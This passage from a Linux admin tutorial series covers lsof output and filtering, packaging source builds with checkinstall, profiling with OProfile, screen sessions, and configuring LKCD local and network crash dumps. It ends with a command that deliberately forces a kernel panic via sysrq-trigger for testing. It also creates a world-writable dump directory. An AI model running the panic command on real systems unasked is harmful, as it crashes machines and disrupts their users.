Now, we’re already having a much better picture of what lsof tells us. For instance, 10u is a pipe used by initctl, a process control initialization utility that facilitates the startup of services during bootup. All in all, it may not mean anything at the moment, but if and when you have a problem, the information will prove useful.

The DEVICE column tells us what device we’re working on. The two numbers are called the major and minor numbers. The list is well known and documented. For instance, major number 8 stands for a SCSI block device. For comparison, IDE disks have a major number of 3. The minor number indicates one of the 15 available partitions. Thus (8,1) tells us we’re working on sda1.

(0,16), the other interesting device listed, refers to unnamed, non-device mounts.

For detailed list, please see:

http://www.kernel.org/pub/linux/docs/device-list/devices.txt

SIZE/OFF is the file size. NODE is the Inode number. Name is the name of the file. Again, do not be confused. Everything is a file. Even your computer monitor, only it has a slightly different representation in the kernel.

Now, we know everything. OK, unfiltered output is too much to digest in one go. So let’s start using some flags for smart filtering of information.

Per process

To see all the open files a certain process holds, use -p:

lsof -p <pid>

lsof -p

Per user

Similarly, you can see files per user using the -u flag:

lsof -u <name>

lsof -u

File descriptors

You can see all the processes holding a certain file descriptor with -d <number>:

lsof -d <number>

lsof -d 3

This is very important if you have hung NFS mounts or blocked processes in uninterruptible sleep (D state) refusing to go away. Your only way to start solving the problem is to dig into lsof and trace down the dependencies, hopefully finding processes and files that can be killed and closed. Alternatively, you can also display all the open file descriptors:

Rising number

Notice that the number is rising in sequence. In general, Linux kernel will give the first available file descriptor to a process asking for one. The convention calls for file descriptors 0, 1 and 2 to be standard input (STDIN), standard output (STDOUT) and standard error (STDERR), so normally, file descriptor allocation will start from 3.
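Here's a minimal, hedged illustration of that convention, assuming a bash shell and that descriptor 3 is currently free (the file name is made up):

exec 3> /tmp/fdtest    # ask the shell to open a new file; it receives the lowest free descriptor, normally 3
lsof -a -p $$ -d 0-3   # show descriptors 0-3 of the current shell; 3 should now point at /tmp/fdtest
exec 3>&-              # close the descriptor again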

If you’ve ever wondered what we were doing when we devnull-ed both the standard output and the standard error in the strace examples, this ought to explain it. We had the following:

something > /dev/null 2>&1

In other words, we redirected standard output to /dev/null, and then we redirected file descriptor 2 to 1, which means standard error goes to standard output, which itself is redirected to the system black hole.

Finding file descriptors can be quite useful, especially if some applications are hard-coding their use, which can lead to problems and conflicts. But that’s a different story altogether.

One more thing notable in the above screenshot is the pair of unix and CHR file types, which we have not yet seen. unix stands for a UNIX domain socket, an interprocess communication socket similar to Internet sockets, only without using a network protocol. CHR stands for a character device. Character devices transfer data one character (byte) at a time; typical examples are terminals, keyboards, mice and similar peripherals, where the order of data is critical.

Do not confuse domain sockets with classic Internet sockets, which are end-points consisting of an IP address and a port.

Netstat-like behavior

lsof can also provide a lot of information similar, and in places identical, to netstat. You can dump the listing of all files and then grep for relevant information, like LISTEN, ESTABLISHED, IPv4, or any other network-related term.
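For instance, a minimal sketch (the -n and -P flags simply keep addresses and ports numeric):

lsof -i | grep LISTEN            # sockets in the listening state
lsof -nP -i | grep ESTABLISHED   # established connections, numeric hosts and ports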

netstat

Internet protocols & ports

Specifically, lsof can also show you the open ports for either the IPv4 or IPv6 protocol, much like an nmap scan against localhost:

lsof -i<protocol>

lsof -i
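The -i option also accepts an optional address specification, so you can narrow things down further; a few hedged examples:

lsof -i4               # IPv4 sockets only
lsof -i6               # IPv6 sockets only
lsof -i TCP:22         # anything talking TCP on port 22
lsof -i @192.168.1.3   # connections to or from a specific host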

Directory search

lsof also supports a number of options that are enabled with a + sign and disabled with a - sign, rather than the typical single or double dash used as an option prefix.

One of these is +d (and +D), which lets you show all the processes holding open files under a certain directory. The capital D recurses, expanding to all the files in the directory and its sub-directories, whereas the lower-case d only covers the directory's immediate contents.

lsof +d <dir name> or lsof +D <dirname>

Dir search

Practical example

I gave you two juicy examples when I wrote the strace tutorial. I skimped a bit with OProfile, because simple and relevant problems that can be quickly demonstrated with a profiler tool are not easy to come by – but do not despair, there shall be an article.

Now, lsof allows plenty of demo space. So here's one.

How do you handle a stuck mount?

Let’s say you have a mount that refuses to go down. And you don’t really know what’s wrong. For some reason, it won’t let you unmount it.

df

/proc/mounts

You tried the umount command, but it does not really work:

Busy

Luckily for you, openSUSE recommends using lsof, but let’s ignore that for a moment.

Anyhow, your mount won't come down. In desperation and against better judgment, you also try forcing the unmounting of the mount point with the -f flag, but it still does not help. Not only is the mount refusing to let go, you may also have corrupted the /etc/mtab file by issuing the forced umount command. Just some food for thought.

Now, how do you handle this?

The hard way

If you’re experienced and know your way about /proc, then you can do the following:

Under /proc, examine the current working directories and file descriptors holding the mount point. Then, examine the process table and see what the offending processes are and if they can be killed.

ls -l /proc/*/cwd | grep just

cwd

Furthermore:

ls -l /proc/*/fd | grep just

fd

Finally, in our example:

ps -ef | grep -E '10878|10910'

ps

And problem solved …

Note: sometimes, especially if you have problems with mounts or stuck processes, lsof may not be the best tool, as it too may get stuck trying to recurse. In these delicate cases, you may want to use the -n and -l flags. -n inhibits the conversion of network IP addresses to domain names, making lsof work faster and avoiding lockups when name lookups are not working properly. -l inhibits the conversion of user IDs to names, quite useful if name lookups are slow or broken, including problems with the nscd daemon, connectivity to NIS, LDAP or whatever, and other issues. However, sometimes, in extreme cases, going for /proc may be the most sensible option.
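As a hedged example, sticking with the stuck mount from this tutorial:

lsof -n -l | grep just   # no DNS or user-name lookups while hunting for the stuck mount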

The easy (and proper) way

By the book, using lsof ought to do it:

lsof | grep just

lsof just

And problem solved. Well, we still need to free the mount by closing or killing the processes and the files held under the mount point, but we know what to do. Not only do we get all the information we need, we get it quickly and efficiently.
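Wrapping up, and reusing the PIDs from the example above (10878 and 10910; yours will differ), the cleanup might look something like this:

kill 10878 10910       # ask the offending processes to exit; use -9 only as a last resort
umount <mount point>   # the mount should now come down cleanly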

Knowing the alternative methods is great, but you should always start smart and simple, with lsof, exploring, narrowing down possibilities and converging on the root cause.

I hope you liked it.

Conclusion

There you go, a wealth of information about lsof and what it can do for you. I bet you won't easily find a detailed explanation of lsof output elsewhere, although examples of the actual usage are aplenty. Well, my tutorial provides you with both.

Now, the big stuff is ahead of you: using lsof to troubleshoot serious system problems without wasting time going through /proc trying to find relevant system information, when it's all there, hidden under just one mighty command.

checkinstall – Smartly manage your installations


The best way to install applications in Linux is by using the package managers. It’s the simplest, safest and most foolproof way of obtaining and maintaining the programs you need. You install them using a friendly and intuitive interface and you uninstall them using the same interface. The dependencies are automatically solved. The program revision is tracked. Whenever you can, use the package manager to get what you need.

There are many package managers available – and they come in two forms: the core utility, which is command-line, and the front-end (GUI), which calls on the command-line tool to do the job. In openSUSE, you have the YaST/zypper combo, in Ubuntu, you have Synaptic/apt, in Fedora, you have Pirut/yum, and so forth.

Teaser

But sometimes, the program you want will not be found in the repositories, not even the extra ones like Medibuntu or RPMForge. You will have to download the sources, compile them and install your package manually.

The problem with this approach is that your manually installed programs will not be visible in your package manager. They won’t show up, nor be available for upgrades or removal, creating a potential clutter/security issue for you, especially if there are many such programs you must use.

Luckily for you, there’s a solution: a utility that can package the sources into installer files that your package manager will recognize and be able to catalog. This utility is called checkinstall.

Enter checkinstall

checkinstall works by functioning as a wrapper for your typical installation from sources. It steps in at the third stage of the configure, make, make install chain: instead of running make install directly, you run checkinstall, which performs the installation while keeping track of every change made to the system. Once the installation is done, it creates a package compatible with your package manager. checkinstall works with RPM, Debian and Slackware packages, covering a rather large install base.
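In other words, a typical hedged run from source looks something like this (the exact configure options depend on the program you're building):

./configure
make
checkinstall    # run as root or via sudo; takes the place of 'make install'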

OK, let’s see this thing in action!

Install checkinstall

The first thing is: install checkinstall. A sort of a chicken and an egg problem. You should probably use your package manager to get checkinstall installed.

Install

Install program from source

Your next step is to find the application you want to install, one that is not found in the repositories. This is not an easy task nowadays. I spent quite a bit of time hunting for a program that I want. Eventually, I settled for Guake, a Quake-like drop-down terminal utility. Please note that it DOES exist in the repositories, but it was as good a choice as any.

So I started the usual chain, with configure and make …

configure

make

Please note that these two steps may fail, depending on the configuration of your system. Some of your libraries may be missing, outdated or too new for the sources you’re trying to compile. Then, the sources themselves might be written badly, with errors and whatnot.

But assuming that everything went smoothly, your next step is to invoke checkinstall as root (or sudo):

checkinstall

Run checkinstall

A short wizard will guide you through the installation & package creation process. If the package documentation directory does not exist, it will ask you to create one.

You will then have the opportunity to write your own documentation:

Documentation

Then comes the installation and the creation of the package. You can change the options if you like. Normally, I would not recommend changing any of the values unless you really know what you’re doing.

Debian package

And soon, you will have the program installed:

Installed

You can even check in your package manager now, to see whether the package is listed and installed as expected. Yup, there it is! Notice our very own documentation!

In package manager

And the application in the menu:

Menu

From now on, the manually installed program is just like any other program. Your package manager will maintain it, sparing you the grueling manual work. Excellent!

Conclusion

checkinstall is a great addition to the Linux user's arsenal of handy tools, especially for experienced users with a taste for non-conventional installations of programs not readily available in the repositories. It allows you to easily keep track of, and order, all your applications, whether they come as package installers or from sources.

Linux super-duper admin tools: OProfile


It’s time to step up the geeky fun a notch and learn about OProfile.

Teaser

OProfile is a Linux system-wide profiling tool that you can use to, uh, profile and analyze performance and runtime problems with your applications, or even the kernel itself. It’s very simple to use and does not require any special preparations. No need to patch the kernel or use debug symbols. Just insert the module and start running.

OProfile uses the hardware performance counters of the CPU to enable profiling of a wide variety of statistics, which you can then use for profiling of the kernel and your applications. In fact, OProfile works with everything, including hardware and software interrupt handlers, kernel modules, the kernel, shared libraries, and applications.

After you've collected the data you need, you can run reports against it, even produce graphs showing you a visualization of the profiled runs.

For more details, please read the Novell Cool Solutions OProfile article and visit the official website, where you can find lots of useful information about the tool, including its numerous features and advantages.

Now, let’s use it.

Warning!

I must warn you though. Officially, OProfile is alpha software. Although it has been tested to work well with a wide range of architecture platforms and kernels, there’s no guarantee it will do what’s expected of it. You may even break your system.

My experience shows no issues with OProfile, but you may not be so lucky. Now, if you’re brave enough, proceed.

Regardless, using OProfile is a very geeky thing that will surely impress everyone and may even provide you with yet another powerful tool for making your environment smarter, faster and safer. Home users will probably never need it, but they just might be piqued enough to give it a try, especially if they're facing severe performance problems. System admin-wise, OProfile probably falls into Level II-III support, so you won't be using it that often, but when you do, it should come in quite handy.

Install OProfile

The tool is available in the repositories of many distributions, so you will not have to download and compile it manually. If you do, consider using checkinstall to have it registered in your software database.

Install

Running OProfile

Now, we need to start using the tool.

The first question you need to ask yourself is: do you also want to profile the kernel? Your answer will determine the OProfile command line.

If you wish to run OProfile without profiling the kernel, then:

opcontrol --no-vmlinux

If you do want to profile the kernel, as well, then:

opcontrol --vmlinux=/boot/vmlinux-`uname -r`

vmlinux

The above command points OProfile at the uncompressed image of the currently running kernel. To make sure such a kernel exists, please take a look under your /boot directory.

Modern Linux distributions ship with the kernel archived (zipped) to conserve space, so you will have to unzip it before it can be used:

Boot dir

So we do have the kernel available, it’s vmlinux-<whatever>.gz. We need to unzip it. This is done with the gunzip command:

gunzip vmlinux-<something>.gz

Like this:

Gunzip

Now, if needed, rerun the opcontrol command from before to set the kernel. Once you’ve done this, launch the tool. It will start collecting the data.
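Assuming a default setup, launching the collection boils down to:

opcontrol --start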

Start

Let it run for a while before stopping it and profiling the data. In fact, to make things meaningful, we'll run a little compilation in the background, so that our report contains more data, as well as more meaningful data. A good example is MPlayer.

Compiling

After a while you can simply dump the collected data and continue profiling or stop the profiler altogether. To just dump the data, use:

opcontrol --dump

To stop it, use:

opcontrol --stop

Stop

If, at any given moment, you wish to reset your profiling counters and start fresh, you can reset the OProfile daemon:

opcontrol --reset

And to shut it down altogether:

opcontrol --shutdown

Reporting

Once you've collected enough data, it's time for a report. To get what you need, just run:

opreport

This is where the real fun begins: analyzing the report and trying to understand the problems you're facing.

Anyhow, here’s a sample of what it may look like. Screenshot taken on another host, so please don’t mind the differences in host names and CPU speeds and such.

Report

More data

In the leftmost column, you will get the exact number of samples collected. In the middle one, the percentage of time spent in different libraries. In the rightmost column, the actual process name. Usually, you will see a whole bunch of glibc, perl and other libraries. If you're compiling a tool that also uses a GUI, you'll see other interesting bits, too.

Since I was also listening to Youtube in Firefox while compiling and doing a few more things, you will notice calls to Nvidia driver, Flash player and so forth.

Now, opreport may not report everything you want and it may even exit with an error. Sometimes, the amount of time spent profiling may not be enough to produce a meaningful report. At other times, you may need packages with debug symbols or even a complete debug kernel.

In that case, you will want to run opreport --symbols or opreport -l to get more data.
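For example, a hedged invocation against a single binary (the path here is purely illustrative):

opreport -l /usr/bin/mplayer   # per-symbol breakdown for one image; debug symbols make the names meaningful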

Symbols

And you may even want to create a call graph. This is done by running opreport -c, provided call-graph collection was enabled beforehand (e.g. with opcontrol --callgraph=<depth>).

Call graph

You will need a tool that can read and display call graphs. There are many, many options available. For example, an oldie but goodie Kpl comes to mind:

Kpl

You may also want to use KCachegrind, but this one requires the call graphs to be in the Valgrind format, which will require a conversion tool. This is where the real hacking kicks in, but this is beyond the scope of this article. We’ll talk about advanced system debugging in following articles. Consider strace and OProfile a sort of a long and expensive warmup.

Conclusion

OProfile is a very handy, useful tool. In the hands of a smart system administrator, it can be used to detect application slowness problems, analyze system bottlenecks, optimize system performance and utilization, and resolve resource/usage conflicts. Combined with a range of other admin programs, some of which we’ve talked about and others we are yet to see, OProfile is a must-have item on the system debugging checklist.

I hope you’ve enjoyed this article. Many more are yet to come, exposing you to the realm of uber-hack. As to profiling itself, we’ll talk about some other cool programs, including Valgrind and Linux Trace Toolkit (LTT).

Linux super-duper admin tools: screen


Time to learn about yet another cool little admin application that will change the way you think and work. We had strace, a mighty, versatile debugging tool that helped us diagnose and categorize system problems quickly and effectively and pointed us in the right direction in our investigation. We had OProfile, a powerful profiling utility that can be used to time system and application performance and identify chokepoints and bottlenecks in program execution. Time to step back and appraise screen.

Teaser

screen

screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells. Each virtual terminal provides the functions of the legendary DEC VT100 terminal.

Additionally, the utility has insert/delete line, support for multiple character sets, a scrollback history buffer for each virtual terminal, and a copy-and-paste mechanism that allows moving text regions between windows.

When screen is called, it creates a single window with a shell in it and then gets out of your way so that you can use the program as you normally would. Then, at any time, you can create new full-screen windows with other programs in them, including more shells, kill existing windows, view a list of windows, turn output logging on and off, copy & paste text between windows, view the scrollback history, switch between windows in whatever manner you wish, etc.

All windows run their programs completely independent of each other. Programs continue to run when their window is currently invisible and even when the whole screen session is detached from the user’s terminal. When a program terminates, screen kills the window that contained it. If this window was in the foreground, the display switches to the previous window; if none are left, screen exits.

In a nutshell, if the Alt + F1-F7 keys (Ctrl + Alt + F1-F7 from a graphical session) allow you to switch between up to seven virtual consoles, horizontally, screen lets you create a practically infinite vertical stack of consoles inside each one of these.

Home users running full GUI desktops and playing with tabbed terminal utilities would be hard-pressed to find merit in screen, but when you're running in runlevel 3 and the monitor space is limited, screen is a blessing.

Screen in action

Let's begin with a few screenshots. To start screen, just type screen in any console window, be it gnome-terminal, xterm, Konsole, or any other.

Launch

This will display an introduction message. Press Enter to dismiss it.

Started

You’re inside a new virtual console. Why not fire another?

First

And here’s the second:

Second

Using the right keyboard shortcuts, we can switch between them, back and forth. Use Ctrl + a then 0 to go to the zeroth (first) screen, Ctrl + a then 1 to go to the second one, and so forth.

First toggled

Now, demonstrating screen with still images is difficult, so here’s a Flash movie! Created using Wink, which served us well so many times, including the tutorial itself, as well as the Windows PowerShell article, and a few others.

So here we go:

Lovely, right! Damn right!

Help window

Don't hesitate to call for help. Ctrl + a, then ? will pop up the help screen.

Help

Of course, you can also read the man page for more details. There's plenty you can do with screen: attach, detach and reattach sessions, specify the history scrollback buffer, turn login mode on and off, suppress error messages, and more. screen is a powerful marvel and you should start using it.
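As a quick, hedged cheat sheet for the session handling mentioned above (the session name is arbitrary):

screen -S work    # start a new session named 'work'
                  # press Ctrl + a, then d, to detach from it
screen -ls        # list running sessions
screen -r work    # reattach to the named session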

Conclusion

Yet another powerful tool mastered. Our list grows bigger, and so does our knowledge. screen may seem trivial to you, but what if you need to debug problems across multiple sessions and you can't afford to have tons of Konsole or xterm windows strewn about the desktop like mad? Then, there's the issue of practical visibility: never take your eyes off the screen and yet enjoy a full multi-view console.

I hope you liked this little surprise. Now, off to new wonders. Stay tuned for many more articles of great admin tools, aptly called super-duper, by me. Be excellent to each other and party on.

Collecting And Analyzing Linux Kernel Crashes – LKCD


Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data as possible. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back online, LKCD is initiated. Different systems use different startup scripts for this; for instance, on a RedHat machine, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first command is lkcd config, which we will review more intimately later. This command prepares the system for the next crash. The second command is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called the dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:

Illustration

Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.

DUMP_ACTIVE=”1″

Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that the DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Incidentally, this partially explains the somewhat nebulous and historic requirement for a swap partition to be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example, /dev/sdb1. Let's use the LKCD default, which calls for the DUMPDEV directive to be set to /dev/vmdump.

DUMPDEV="/dev/vmdump"

Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump -> /dev/sda5

/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the /etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.
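For instance, assuming /dev/sdb1 is a partition whose contents you can afford to overwrite, the manual link could look like this:

ln -s /dev/sdb1 /dev/vmdump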

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.

DUMPDIR="/tmp/dump"

And a screenshot of the configuration file in action, just to make you feel comfortable:

Dumpdir

Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

The possible values and their actions are:

  • DUMP_NONE (0) – Do nothing, just return if called
  • DUMP_HEADER (1) – Dump the dump header and first 128K bytes
  • DUMP_KERN (2) – Everything in DUMP_HEADER and kernel pages only
  • DUMP_USED (4) – Everything except kernel free pages
  • DUMP_ALL (8) – All memory
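As a hedged example, assuming the directive takes the numeric values listed above, a setting consistent with the query output shown later (header plus kernel pages) would be:

DUMP_LEVEL="2"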

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

The flag values and their meanings are:

  • 0x80000000 – Local block device
  • 0x40000000 – Network device

Later, we will also use the network option. For now, we need local.

DUMP_FLAGS="0x80000000"

Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed or use RLE or GZIP to compress them. It’s up to you.

DUMP_COMPRESS="2"

I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.

Additional settings

There are several other directives listed in the configuration file. These other directives are all set to the configuration defaults. You can find a brief explanation of each below. If you find the section inadequate, please email me and I'll elaborate.

These include:

  • DUMP_SAVE="1" – Save the memory image to disk
  • PANIC_TIMEOUT="5" – The timeout (in seconds) before a reboot after a panic occurs
  • BOUNDS_LIMIT="10" – A limit on the number of dumps kept
  • KEXEC_IMAGE="/boot/vmlinuz" – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE="root console=tty0" – Defines what parameters the kernel should use when booting after the crash; usually, you won't have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step we need to do is enable core dump capturing. In other words, we need to, sort of, source the configuration file so the LKCD utility can use the values set in it. This is done by running the lkcd config command, followed by the lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, the LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …

Note:

Disk-based dumping may not always succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like md RAID devices, introducing another problem into the equation. Therefore, to overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider using the network dumping option. So, before we demonstrate the LKCD functionality, we'll study the netdump option first.

LKCD netdump procedure

The netdump procedure differs from the local dump in that two machines are involved in the process. One is the host that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port for incoming network traffic particular to the LKCD netdump. When crashes are sent, they will be saved to the local block device on the server. Other terms used to describe the relationship between the netdump server and the client are source and target, if you will: the client is the source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.

DUMP_FLAGS="0x40000000"

Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.

SOURCE_PORT="6688"

Make sure dump directory is writable for the netdump user

This directive is extremely important. It defines the ability of the netdump service to write to the partitions / directories on the server. The netdump server runs as the netdump user. We need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.
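A minimal sketch of that manual route, equivalent in effect to the install command above:

mkdir -p /tmp/dump
chown netdump:dump /tmp/dump
chmod 777 /tmp/dump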

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status

Likewise:

netstat -tulpen | grep 6688
udp 0 0 0.0.0.0:6688 0.0.0.0:* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

The client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When the kernel crashes on this machine, for whatever reason, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we configured our clients to dump their core to the /dev/vmdump device. However, a network dump requires an active network interface. There are other considerations as well, but we will review them later.

DUMP_DEV="eth0"

Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it's the server machine we configured above. To configure this directive – and the one after it – we need to go back to our server and collect some information from the output of the ifconfig command: the IP address and the MAC address. For example:

inet addr:192.168.1.3
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:

TARGET_HOST="192.168.1.3"

Alternatively, it is also possible to use hostnames, but this requires a hosts file, DNS, NIS or another name resolution mechanism, properly set up and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:

ETH_ADDRESS="00:12:1b:40:c7:63"

Limitation:

Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means /24 subnet. We’ll see an example for this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.

TARGET_PORT="6688"

Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.

SOURCE_PORT="6688"

And an image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd query commands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:

Success

This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to trigger a panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been enabled:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

